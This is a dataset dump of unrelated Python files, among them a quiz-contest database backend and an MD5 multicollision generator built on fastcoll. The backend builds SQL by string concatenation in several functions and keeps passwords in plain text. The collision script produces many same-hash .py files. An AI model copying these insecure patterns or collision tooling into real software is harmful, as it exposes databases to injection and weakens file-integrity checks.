text stringlengths 38 1.54M |
|---|
# coding=utf-8
import pyglet
import BasePiece
class Piece(BasePiece.BasePiece):
def __init__(self, name, x, y):
self.__name = name
self.current_position = [x, y]
self.__target_position = []
self.isKilled = False
self.__position_history = []
self.PreparePiece(name)
self.__selected = False
def Kill(self):
pass
def Killed(self):
self.isKilled = True
def Select(self, window):
#window.clear()
if self.__selected == False:
self.__selected = True
self.ChangeColor()
self.ShowPiece()
else:
self.__selected = False
self.ChangeColor()
self.ShowPiece()
def Move(self, x, y, window):
window.clear()
if self.__selected == False:
pass
else:
self.__target_position = [x, y]
self.current_position = self.__target_position
self.target_position = []
self.PreparePiece(self.__name)
self.ShowPiece()
self.__selected = False
if __name__ == "__main__":
window = pyglet.window.Window()
p = Piece(u"象", 100, 100)
@window.event()
def on_mouse_press(x, y, button, modifiers):
if x in range(p.current_position[0] - 12, p.current_position[0] + 12) \
and y in range(p.current_position[1] - 12, p.current_position[1] + 12):
p.Select(window)
window.clear()
else:
p.Move(x, y, window)
@window.event()
def on_draw():
window.clear()
p.ShowPiece()
pyglet.app.run() |
import requests as req
import json
url='http://localhost:9515/session'
data=json.dumps({
"desiredCapabilities": {
"caps": {
"nativeEvents": "false",
"browserName": "chrome",
"version": "",
"platform": "ANY"
}
}
})
r=req.post(url,data)
# req.delete('http://localhost:9515/session/1edf41f715a2dbccf6ea7216bfa13998')
#req.post()
# print(r.json())
# r = req.get('http://google.com')
# r.url
class ApiBase:
pass |
# 讀取檔案,把內容存成清單
def read_file(filename):
data = []
with open(filename, 'r') as f:
for line in f:
data.append(line)
return data
# 印出長度小於某數的留言數量
def word_count_filter(data, amount):
new = []
for d in data:
if len(d) < amount:
new.append(d)
print(f'一共有{len(new)}筆留言長度小於{amount}')
# 印出有某個字的留言數量
def key_word_filter(data, keyword):
new = []
for d in data:
if keyword in d:
new.append(d)
print(f'一共有{len(new)}筆留言提到{keyword}')
# # list comprehension 清單快寫法
# good = [d for d in data if 'good' in d]
# print(good)
# 把字和字數建立成字典,讓使用者查字數
def word_count(filename):
datas = read_file(filename)
dic = {}
for data in datas:
words = data.split() # words is a list
for word in words:
if word in dic: # word is a word
dic[word] += 1
else:
dic[word] = 1
while True:
word = input('請輸入你要查詢的字: ')
if word == 'q':
break
if word in dic:
print(word, '出現的次數為', dic[word])
else:
print('這個字不在字典裡')
|
import pymysql
import aws_credentials as rds
import string
import random
import datetime
def id_generator(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def ticket_generator(size, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def signup(email,password):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
UserID = id_generator(64)
with conn.cursor() as cur:
sql = "insert into UserMaster (UserId, Name, EmailAddress, PasswordHash) value (%s,%s,%s,%s)"
name=email.split("@")[0]
cur.execute(sql,(UserID, name, email,password))
conn.commit()
except Exception as e:
print("error in sign up for email",email,"error: ",e)
def login(email,password):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select UserId, Name, PasswordHash, WalletBalance, CreateDate from UserMaster where EmailAddress=%s"
cur.execute(sql,(email))
data = cur.fetchall()
if(password == data[0][2]):
return {'correct': "correct","UserID": data[0][0], "Name": data[0][1], "WalletBallance": data[0][3], "CreatedDate": data[0][4]}
else:
return {'correct': "wrong"}
except Exception as e:
print("error in loging-in for email",email,"error: ",str(e))
return {'correct': "wrong"}
def UserExist(email):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select exists(select * from UserMaster where EmailAddress=%s)"
cur.execute(sql,(email))
exist = cur.fetchall()
return exist[0][0]
except Exception as e:
print("error in UserExist API for email",email,"error: ",str(e))
return 0
def change_password(email,password):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "update UserMaster set PasswordHash = %s where EmailAddress=%s"
cur.execute(sql,(password, email))
conn.commit()
except Exception as e:
print("error in change_password API for email",email,"error: ",str(e))
return 0
def contestList():
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select * from ContestMaster where date(CompletionDate) > date(now());"
cur.execute(sql)
data = cur.fetchall()
return data
except Exception as e:
print("error in Listing Contest error: ",str(e))
return
def get_contest_details(contestID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select * from ContestAwardDetails where ContestID = %s order by StartRank ASC;"
cur.execute(sql,contestID)
data = cur.fetchall()
return data
except Exception as e:
print("error in getting Contest data, error: ",e)
return "error"
def get_contest_pay(contestID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select TicketPrice from ContestMaster where ContestID = %s"
cur.execute(sql,contestID)
data = cur.fetchall()
return data
except Exception as e:
print("error in getting contest entry fees, error:",e)
return "error"
def get_Current_Wallet_Balance(userid):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select WalletBalance from UserMaster where UserID = %s"
cur.execute(sql,userid)
data = cur.fetchall()
return data
except Exception as e:
print("error in getting Wallet Balance, error:",e)
return "error"
def isspotsLeft(contestID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select SpotsLeft from ContestMaster where contestID = %s"
cur.execute(sql,contestID)
data = cur.fetchone()
if(data[0]>0):
return True
return False
except Exception as e:
print("error in checking Spots lefts, error:",e)
return "error"
def get_ticket(contestID,UserID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select WalletBalance from UserMaster where UserID = %s"
cur.execute(sql,UserID)
walletBallance = cur.fetchall()[0][0]
sql ="select TicketPrice from ContestMaster where ContestID = %s"
cur.execute(sql,contestID)
TicketPrice = cur.fetchall()[0][0]
if(walletBallance < TicketPrice):
return "Money_limit"
ticketid = ticket_generator(64)
TicketState = 0
sql = "insert into UserContestParticipationDetails (TicketID, UserID, ContestID, TicketState) value (%s,%s,%s,%s)"
cur.execute(sql,(ticketid, UserID, contestID, TicketState))
# if TicketState equals 0: means ticket is not used
# if 1: means ticket is used
# if 2: means ticket is expired without use
# if 3: means ticket is expired and used
conn.commit()
return ticketid
except Exception as e:
print("error in getting ticket, error:",e)
return "error"
def get_Current_Wallet_Balance(userid):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select WalletBalance from UserMaster where UserID = %s"
cur.execute(sql,userid)
data = cur.fetchall()
return data
except Exception as e:
print("error in getting Wallet Balance, error:",e)
return "error"
def ticket_history(UserID,contestID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
if contestID == "all":
sql = "select * from UserContestParticipationDetails where UserID = %s order by CreatedDate desc"
cur.execute(sql,UserID)
data = cur.fetchall()
return data
else:
sql = "select * from UserContestParticipationDetails where UserID = %s and ContestID = %s order by CreatedDate desc"
cur.execute(sql,(UserID,contestID))
data = cur.fetchall()
return data
except Exception as e:
print("error in getting ticket history, error:",e)
return "error"
def ticket_state(ticketID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select TicketState from UserContestParticipationDetails where TicketID = %s"
cur.execute(sql,ticketID)
data = cur.fetchone()
return data[0]
except Exception as e:
print("error in getting ticket State, error:",e)
return "error"
def ticket_start_time(ticketID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select TestStartDate from UserContestParticipationDetails where TicketID = %s"
cur.execute(sql,ticketID)
data = cur.fetchone()
return data[0]
except Exception as e:
print("error in getting ticket Start date, error:",e)
return "error"
def ticket_info(ticketID):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select * from UserContestParticipationDetails where TicketID = %s"
cur.execute(sql,ticketID)
data = cur.fetchone()
return data
except Exception as e:
print("error in getting ticket info, error:",e)
return "error"
question_map={}
def get_random_questions(ticketid):
if ticketid in question_map:
return question_map[ticketid]
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select QuestionID, QuestionDescription, Option1, Option2, Option3, Option4 from QuestionBank order by rand() limit 10;"
cur.execute(sql)
data = cur.fetchall()
question_map[ticketid]=data
return data
except Exception as e:
print("error in getting questions, error:",e)
return "error"
def use_ticket(startdate, ticketid):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "update UserContestParticipationDetails set TestStartDate = %s where TicketID=%s"
cur.execute(sql,(startdate, ticketid))
conn.commit()
return "done"
except Exception as e:
print("error in useing ticket, error: ",str(e))
return "error"
def finish_ticket(starttime, ticketid, q_response_dic):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
total = len(q_response_dic)
marks_obtain = 0
for key,value in q_response_dic.items():
check = iscorrect(key,value)
if(check=="error"):
return "error"
elif(check==1):
marks_obtain+=1
state = ticket_state(ticketid)
if(state=="error"):
return "error"
elif(state==0):
state=1
try:
with conn.cursor() as cur:
sql = "update UserContestParticipationDetails set ObtainedScore = %s, MaximumScore =%s, TestSubmitDate = %s,TicketState = %s where TicketID=%s"
cur.execute(sql,(marks_obtain, total, starttime, state, ticketid))
conn.commit()
return "done"
except Exception as e:
print("error in finish ticket, error: ",str(e))
return "error"
def iscorrect(questionID, response):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select CorrectOption from QuestionBank where QuestionID=%s"
cur.execute(sql,questionID)
correct_option = cur.fetchone()
if(correct_option[0] == response):
return 1
else:
return 0
except Exception as e:
print("error in checking question correctness, error: ",str(e))
return "error"
def CreateContest(ContestID, CompletionDate, TicketPrice, TotalSpots):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "Insert into ContestMaster (ContestID, CompletionDate, TicketPrice, TotalSpots, SpotsLeft) value ('"+ContestID+"','"+CompletionDate+"',"+TicketPrice+","+TotalSpots+","+TotalSpots+")"
cur.execute(sql)
conn.commit()
except Exception as e:
print("error in Creating Contest, error: ",str(e))
return "error"
def create_event(ContestID, CompletionDate):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
event_name = "event_"+str(ContestID)
sql = "create event " + event_name +" ON SCHEDULE AT '" + CompletionDate +"' DO update UserContestParticipationDetails set TicketState = TicketState + 2 where ContestID = %s"
cur.execute(sql,ContestID)
conn.commit()
except Exception as e:
print("error in Creating Contest end event, error: ",str(e))
return "error"
def get_all_contest():
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "select * from ContestMaster"
cur.execute(sql)
return cur.fetchall()
except Exception as e:
print("error in getting all Contest, error: ",str(e))
return "error"
def add_contest_details(StartRank, EndRank, Prize,contestid):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "insert into ContestAwardDetails (ContestID, StartRank, EndRank, AwardAmount) values ('"+contestid+"','"+StartRank+"','"+EndRank+"','"+Prize+"')"
cur.execute(sql)
conn.commit()
except Exception as e:
print("error in adding Contest details, error: ",str(e))
return "error"
def delete_contest_details(StartRank, EndRank, contestid):
conn = pymysql.connect(
host = rds.host,
port = rds.port,
user = rds.user,
password = rds.password,
db = rds.databasename,
)
try:
with conn.cursor() as cur:
sql = "delete from ContestAwardDetails where StartRank ="+StartRank+" and EndRank = "+EndRank+" and ContestID = '"+contestid+"'"
cur.execute(sql)
conn.commit()
except Exception as e:
print("error in deleting Contest details, error: ",str(e))
return "error" |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Time : 2018/10/17
@Author : AnNing
"""
import datetime
from dateutil.relativedelta import relativedelta
import numpy as np
def is_day_timestamp_and_lon(timestamp, lon):
"""
根据距离 1970-01-01 年的时间戳和经度计算是否为白天
:param timestamp: 距离 1970-01-01 年的时间戳
:param lon: 经度
:return:
"""
zone = int(lon / 15.)
stime = datetime.utcfromtimestamp(timestamp)
hh = (stime + relativedelta(hours=zone)).strftime('%H')
if 6 <= int(hh) <= 18:
return True
else:
return False
def filter_data_by_delta_sigma(x, y, w=None, n=8):
"""
过滤正负 delta + n 倍的 std 的杂点
:param x:
:param y:
:param w:
:param n:
:return:
"""
c = np.polyfit(x, y, 1, w=w)
k1 = c[0]
k0 = c[1]
regression_line = x * k1 + k0
delta = np.abs(y - regression_line)
delta_mean = np.nanmean(delta)
delta_std = np.nanstd(delta)
y_max = regression_line + delta_mean + delta_std * n
y_min = regression_line - delta_mean - delta_std * n
index = np.logical_and(y < y_max, y > y_min)
return index
def filter_data_by_time(data, timestamp, longitude, time):
index = get_time_index_by_timestamp_longitude(timestamp, longitude, time)
if isinstance(data, dict):
for k, d in data.items():
data[k] = d[index]
else:
data = data[index]
return data
def get_time_index_by_sun_zenith(zenith, time):
"""
获取白天 晚上 全量的索引
zenith >= 90是晚上,zenith < 90是白天
:param zenith:
:param time: day night all
:return:
"""
time = time.lower()
if time == 'all':
index = np.where(zenith)
elif time == 'day':
index = np.where(zenith < 90)
elif time == 'night':
index = np.where(zenith >= 90)
else:
raise KeyError('{} can not be handled.'.format(time))
return index
def get_time_index_by_timestamp_longitude(timestamp, longitude, time):
"""
获取白天 晚上 全量的索引
:param timestamp:
:param longitude:
:param time: day night all
:return:
"""
time = time.lower()
vectorize_is_day = np.vectorize(is_day_timestamp_and_lon)
if time == 'all':
index = np.where(timestamp)
elif time == 'day':
index = vectorize_is_day(timestamp, longitude)
elif time == 'night':
index = np.logical_not(vectorize_is_day(timestamp, longitude))
else:
raise KeyError('{} can not be handled.'.format(time))
return index
def has_empty_data_or_not_equal_length(datas):
length = set()
for data in datas:
if not data:
return True
else:
length.add(len(data))
if len(length) > 1:
return True
return False
|
import sys
import time
import threading
from itertools import count
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import random
import numpy as np
import time
import datetime as dt
import matplotlib.pyplot as plt
plt.style.use('dark_background')
# length of window
n = 50
# Create figure for plotting
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
xs = list(range(n))
ys = [0]*n
# This function is called periodically from FuncAnimation
def animate(i, xs, ys):
# Add x and y to lists
# xs.append(dt.datetime.now().strftime('%H:%M:%S.%f'))
ys.append(random.randint(0, 100))
# Limit x and y lists to 'n' items
# xs = xs[-n:]
ys = ys[-n:]
# Draw x and y lists
ax.clear()
ax.plot(xs, ys)
# Format plot
plt.xticks(rotation=45, ha='right')
plt.subplots_adjust(bottom=0.30)
plt.title('Fancy title')
plt.ylabel('Sun sensor (%)')
plt.axis([0,n+4,0,100])
plt.xticks([])
# Set up plot to call animate() function periodically
ani = animation.FuncAnimation(fig, animate, fargs=(xs, ys), interval=500)
plt.show()
# --------------------------------
#
# # plotting
# plt.style.use('dark_background')
#
# plt.axis([0, 50, 0, 100])
#
# x_values = []
# y_values = []
#
# for i in range(50):
# x_values.append(i)
# y_values.append(random.randint(0, 100))
# plt.plot(x_values, y_values,'r')
# plt.pause(0.05)
#
# # for future
# timeAx = dt.datetime.now().strftime('%H:%M:%S.%f')
#
# plt.show()
# ----------------------------------------------
#
# plt.style.use('fivethirtyeight')
#
# x_values = []
# y_values = []
#
# index = count()
#
# # plotting
# def animate(i):
# x_values.append(next(index))
# # y_values.append(tlm('ESAT12_WIFI ADCS_PACKET ADCS_SOLAR_SENSOR_X_PLUS'))
# y_values.append(random.randint(0,100))
# plt.cla()
# plt.plot(x_values,y_values)
# # print(tlm('ESAT12_WIFI ADCS_PACKET ADCS_SOLAR_SENSOR_X_PLUS'))
# # print(get_tlm_buffer('ESAT12_WIFI', 'ADCS_PACKET'))
#
# ani = FuncAnimation(plt.gcf(),animate, 150)
#
# plt.tight_layout()
# plt.show() |
# Generated by Django 2.2.12 on 2020-09-03 19:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('homepage', '0011_session_table'),
]
operations = [
migrations.CreateModel(
name='current_session',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('session', models.IntegerField(default=0)),
],
),
]
|
import hashlib
import shlex
import subprocess
from os import system
def Mash(input):
m = hashlib.md5()
m.update(input)
print(m.hexdigest())
def main():
curFiles = 2
subprocess.run(["./fastcoll", "-p", "prefix", "-o", "col0", "col1"])
while(curFiles<=32):
subprocess.run(["./fastcoll", "-p", "col0", "-o", "colx", "coly"])
with open("colx", "rb") as f:
byte1 = f.read()
with open("coly", "rb") as f:
byte2 = f.read()
newHash1 = []
newHash2 = []
L1= len(byte1)
L2= len(byte2)
id=1
while(id!=129):
newHash1.append(byte1[L1-id])
id=id+1
newHash1.reverse()
# print(newHash1)
id=1
while (id != 129):
newHash2.append(byte2[L2 - id])
id = id + 1
newHash2.reverse()
newHash1 = bytes(newHash1)
newHash2 = bytes(newHash2)
hashList={}
for i in range(0,curFiles):
filename="col"+str(i)
with open(filename, "rb") as f:
prev = f.read()
newHash1 = bytes(newHash1)
prev = prev + newHash1
hashList["col"+str(i*2)]=prev
filename = "col" + str(i)
with open(filename, "rb") as f:
prev = f.read()
newHash2 = bytes(newHash2)
prev = prev + newHash2
hashList["col"+str(i*2+1)] = prev
for i in range(0, curFiles):
filename = "col" + str(i * 2)
f = open(filename, "wb")
f.write(hashList[filename])
filename = "col" + str(i * 2 + 1)
f = open(filename, "wb")
f.write(hashList[filename])
curFiles=curFiles*2
#
curFiles= int(curFiles/2)
print("verification")
for i in range(0,curFiles):
filename = "col" + str(i * 2)
print(filename+":")
f=open(filename,"rb")
newFilename="file"+str(i * 2)+".py"
fx = open(newFilename, "wb")
system("cat "+filename+" suffix1 > "+newFilename)
inp=f.read()
Mash(inp)
filename = "col" + str(i * 2 + 1)
print(filename+":")
f = open(filename, "rb")
newFilename = "file" + str(i * 2+1) + ".py"
fx = open(newFilename, "wb")
system("cat " + filename + " suffix1 > "+newFilename)
inp = f.read()
Mash(inp)
if __name__ == '__main__':
main()
# now run the he 00HelpingFunction function |
import numpy as np
import time
import scipy.spatial as sp
import scipy
import matplotlib.path as mpltpath
import matplotlib.pyplot as plt
from scipy import interpolate
rtimewprMFs=[]
rtimesum=[]
print("lsspy.optMF3D: This optimized library computes the 3-D Minkowski Functional based on a Voronoi Tessellation.\n")
C_chi=(4./3)*np.pi #parameter often used
def Voronoi(points):
return sp.Voronoi(points)
def dist(x1,x2):
xsep=x1-x2
return np.sqrt(np.einsum('i,i', xsep, xsep))
def zfastsolang(dtp,rop,one,nprop,npone,sin,cos):
dtpsq=dtp**2
return 2*np.arctan((rop*one*sin)/(nprop*npone+dtp*(nprop+npone)+rop*one*cos+dtpsq))
def get_G_ijk(r,h,d12,d23,d31):
s=(d12+d23+d31)/2
a=2*np.arctan((2*h*np.sqrt(s*(s-d12)*(s-d23)*(s-d31))/(4*r**2-(d12**2+d23**2+d31**2)/2))/r)
if a<0:
return 2*np.pi+a
return a
def get_G_ijko(r,d12,d23,d31):
r2=2*r
a3=2*np.arcsin(d12/r2)
a1=2*np.arcsin(d23/r2)
a2=2*np.arcsin(d31/r2)
return 4*np.arctan(np.sqrt(np.tan((a1+a2+a3)/4)*np.tan((a1+a2-a3)/4)*np.tan((a1-a2+a3)/4)*np.tan((-a1+a2+a3)/4)))
def norm(v):
return np.sqrt(np.einsum('i,i', v, v))
def normvec(v):
return v/np.sqrt(np.einsum('i,i', v, v))
def polarea2d(verts):
xys=verts.T
return np.abs(np.dot(xys[0][:],np.roll(xys[1][:],-1))-np.dot(xys[1][:],np.roll(xys[0][:],-1)))/2
def verttoedges(verts):
edges=[]
for i in range(len(verts)):
edges.append(np.array([verts[i-1],verts[i]]))
return np.array(edges)
def kdt(points):
return sp.cKDTree(points)
def get_norms(rs,size):
nvols=(size-4*rs)**3
nareas=(size-4*rs)**2
nlens=(size-4*rs)
return [nvols,nareas,nlens]
def getplane_abcd(edges):
v1=edges[1]-edges[0]
v2=edges[2]-edges[0]
n=np.cross(v1,v2)
return n,-np.dot(n,edges[0])
def getline_abc(edge):
return np.array([edge[1][1]-edge[0][1],edge[0][0]-edge[1][0]]),edge[0][1]*(edge[1][0]-edge[0][0])-edge[0][0]*(edge[1][1]-edge[0][1])
def disttoplane(x,n,d):
normsq=np.sum(np.square(n))
dvun=n.dot(x)+d
return np.abs(dvun)/np.sqrt(normsq), x-n*dvun/normsq
def center(verts):
return np.mean(verts,axis=0)
def convcoor(nn,h,verts):
cent=center(verts)
xax=normvec(cent-h)
yax=np.cross(nn,xax)
vertsp=verts-h
ys=np.dot(vertsp,yax)
xs=np.dot(vertsp,xax)
vertss=np.array([xs,ys]).T
path = mpltpath.Path(vertss)
if path.contains_point([0,0]):
return vertss,True,np.arctan2(ys,xs)
return vertss,False,np.arctan2(ys,xs)
def vertstoedgesorted(verts):
# maps the same edges to the exact same objects
edges=[]
for i in range(len(verts)):
if verts[i-1]<=verts[i]:
edges.append((verts[i-1],verts[i]))
else:
edges.append((verts[i],verts[i-1]))
return edges
class VCells:
def __init__(self):
self.pointstowall={}
self.adjm={}
self.edgecounter={}
self.walls={}
self.wallparams={}
def add_wall(self,idd,ptinds,wall,d,tpoints):
offflag=False
if any([x==-1 for x in wall]):
offflag=True
if ptinds[0]<=ptinds[1]:
ind=(ptinds[0],ptinds[1])
else:
ind=(ptinds[1],ptinds[0])
if not offflag:
self.pointstowall[ind]=idd
self.walls[idd]=wall
self.wallparams[idd]=[d,tpoints]
for edgeinds in vertstoedgesorted(wall):
if not edgeinds in self.edgecounter:
self.edgecounter[edgeinds]=1
else:
self.edgecounter[edgeinds]+=1
self.adjm.setdefault(edgeinds,[]).append(d)
def gen_wall_lists(self,size):
try:
self.walllists
print("Walllists Already Generated")
return
except:
self.walllists=[[] for _ in range(size)]
print("Generating Walllists")
st=time.time()
for pinds,wallidd in self.pointstowall.items():
self.walllists[pinds[0]].append(wallidd)
self.walllists[pinds[1]].append(wallidd)
print("Walllists generated")
def gen_wall_params(self,vor,contributingwalls=None):
print("Wall Based pre-computation running.")
st=time.time()
verbosecount=0
waltotnum=len(self.walls)
for idd,wall in self.walls.items():
if verbosecount%200==0 and verbosecount!=0:
print("\r "+str(100*(verbosecount+1)/waltotnum)+" % Processed",end="")
verbosecount+=1
if not contributingwalls==None:
if idd not in contributingwalls:
continue
x=self.wallparams[idd][1][0]
y=self.wallparams[idd][1][1]
verts=vor.vertices[wall]
maxrforwall=0
vertdists=[]
for vert in verts:
dt=dist(x,vert)
vertdists.append(dt)
if dt>maxrforwall:
maxrforwall=dt
n=x-y
d=-n.dot(x+y)/2
dtp,h=disttoplane(x,n,d)
verts2d,inside,thets=convcoor(normvec(n),h,verts)
wallarea=polarea2d(verts2d)
vert2dnorms=[]
for vert2d in verts2d:
vert2dnorms.append(norm(vert2d))
solangs=[]
dtes=[]
thetas=[]
sss=[]
for i,(edge2d,thet2) in enumerate(zip(verttoedges(verts2d),verttoedges(thets))):
nop,c=getline_abc(edge2d)
nopnormsq=np.einsum('i,i', nop, nop)
nopnorm=np.sqrt(nopnormsq)
dte=np.abs(c)/nopnorm
dtes.append(dte)
theta=thet2[1]-thet2[0]
if inside:#detect crossing at pi
if theta<-np.pi:
theta+=2*np.pi
elif theta>np.pi:
theta-=2*np.pi
s=np.abs(np.sin(theta))
ccos=np.cos(theta)
thetas.append((theta,s,ccos))
xdet=-nop[0]*c/nopnormsq
if (xdet>edge2d[0][0] and xdet<edge2d[1][0]) or (xdet<edge2d[0][0] and xdet>edge2d[1][0]):
sss.append(False)
else:
sss.append(True)
if theta>=0:
solangs.append(zfastsolang(dtp,vert2dnorms[i-1],vert2dnorms[i],vertdists[i-1],vertdists[i],s,ccos))
else:
solangs.append(-zfastsolang(dtp,vert2dnorms[i-1],vert2dnorms[i],vertdists[i-1],vertdists[i],s,ccos))
fullsolang=np.abs(np.sum(solangs))
self.wallparams[idd].extend((fullsolang,maxrforwall,wallarea,vertdists,dtp,solangs,dtes,thetas,vert2dnorms,sss, (verts2d,inside)))
print()
print("Wall Based precomputation completed. Time: "+str(time.time()-st))
print()
def gen_vol(self,rs,size):
nvols=(size-4*rs)**3
nareas=(size-4*rs)**2
nlens=(size-4*rs)
self.norms=[nvols,nareas,nlens]
def gen_ptrcellvol(self,size,contributingwalls):
self.ptrcellvol=[0 for _ in range(size)]
print("Generating Particle cell volume")
st=time.time()
for pinds,idd in self.pointstowall.items():
if idd not in contributingwalls:
continue
thisvol=self.wallparams[idd][4]*self.wallparams[idd][6]/3.
self.ptrcellvol[pinds[0]]+=thisvol
self.ptrcellvol[pinds[1]]+=thisvol
print("Particle cell volume Generated. Time: "+str(time.time()-st))
def gen_wprMFs(self,rs,contributingwalls=None,accelerate=False,accelerator=None):#one-side computation
global rtimewprMFs
print("Calculating Reduced Minkowski Functionals.")
self.wprMFs=[{} for _ in range(len(rs))]
n=len(self.walls)
if accelerate:
print("Accelerating. This loses physical meaning for the wall partial MFs but they will not affect the pMF of balls.")
if accelerator==None:
assert False,"No Accelerator given"
st=time.time()
for i,r in enumerate(rs):
freestoadd=0
verbosecount=0
stt=time.time()
for idd,wall in self.walls.items():
if not contributingwalls==None:
if idd not in contributingwalls:
continue
if verbosecount%200==0 and verbosecount!=0:
print("\r Integration "+str(100*(verbosecount+1)/n)+" % Processed",end="")
if accelerate and (accelerator[0][idd]>r or accelerator[1][idd]<r):
continue
else:
dstosend=[]
for edgeinds in vertstoedgesorted(wall):
if len(self.adjm[edgeinds])!=3:
print("NOT 3-cell edge: ",edgeinds,self.adjm[edgeinds],wall)
dstosend.append(self.adjm[edgeinds])
self.wprMFs[i][idd]=getrMF(idd,r,self.wallparams[idd],dstosend)
rtime=time.time()-stt
rtimewprMFs.append(rtime)
print("\r\tComputation for r= "+str(r)+" done. Time: "+str(rtime),end="")
print()
print("Computation Completed. Time: "+str(time.time()-st))
print()
def gen_pMF(self,rs,totnum,boundinds,accelerate=False,ptrbound=None):
global rtimesum
print("Summing over wall contributions")
self.pMF=np.full((len(rs),totnum,4),np.nan)
if accelerate:
print("Accelerating.")#" Make sure the use of the ptrbound got from gen_wprMFs")
if ptrbound==None:
assert False,"No ptrbound or ptrcellvol given."
st=time.time()
ttt=0
for ir,r in enumerate(rs):
stt=time.time()
print("\r Summing for r= "+str(r)+" done.",end="")
contpartind=0
for i in range(totnum):
if i in boundinds:
self.pMF[ir,i,0]=0
self.pMF[ir,i,1]=0
self.pMF[ir,i,2]=0
self.pMF[ir,i,3]=0
continue
stt=time.time()
if accelerate and ptrbound[0][i]>=r:
self.pMF[ir,i,0]=C_chi*r**3
self.pMF[ir,i,1]=C_chi*r**2
self.pMF[ir,i,2]=C_chi*r
self.pMF[ir,i,3]=C_chi
contpartind+=1
continue
if accelerate and ptrbound[1][i]<=r:
self.pMF[ir,i,0]=self.ptrcellvol[i]
self.pMF[ir,i,1]=0
self.pMF[ir,i,2]=0
self.pMF[ir,i,3]=0
contpartind+=1
continue
M0=0
M1=0
M2=0
M3=0
for idd in self.walllists[i]:
addval=self.wprMFs[ir][idd]
M0+=addval[0]
M1+=addval[1]
M2+=addval[1]/r-addval[2]/2.#Non trivial - sign!! divided by two sheels-> 1/2 factor
M3+=addval[1]/r**2-addval[3]/2.+addval[4]/6.#non trivial 1/6 each edge section is accessed 6 times, 2 times per cell
self.pMF[ir,i,0]=M0
self.pMF[ir,i,1]=M1
self.pMF[ir,i,2]=M2
self.pMF[ir,i,3]=M3
contpartind+=1
if contpartind+len(boundinds)!=totnum:
assert False, "Wrong adding"
rtime=time.time()-stt
rtimesum.append(rtime)
print()
print("Total pMF generated. Time: "+str(time.time()-st))
def gen_MF(self,MD0,MD1,MD2,MD3):
print("Summing over all contributing particles")
copiedpMF=np.nan_to_num(self.pMF)#to remove nan indicators
self.MF=np.sum(copiedpMF,axis=1)
self.MFD=self.MF.copy()
for i in range(4):#principal kinematical formula
if i==0:
self.MFD[:,i]=self.MF[:,i]/MD0
if i==1:
self.MFD[:,i]=self.MF[:,i]/MD0#+self.MFD[:,i-1]*MD1/MD0
if i==2:
self.MFD[:,i]=self.MF[:,i]/MD0#+(2*self.MFD[:,i-1]*MD1)/MD0#self.MFD[:,i-2]*MD2+
if i==3:
self.MFD[:,i]=self.MF[:,i]/MD0#+(3*self.MFD[:,i-2]*MD2+3*self.MFD[:,i-1]*MD1)/MD0#self.MFD[:,i-3]*MD3+
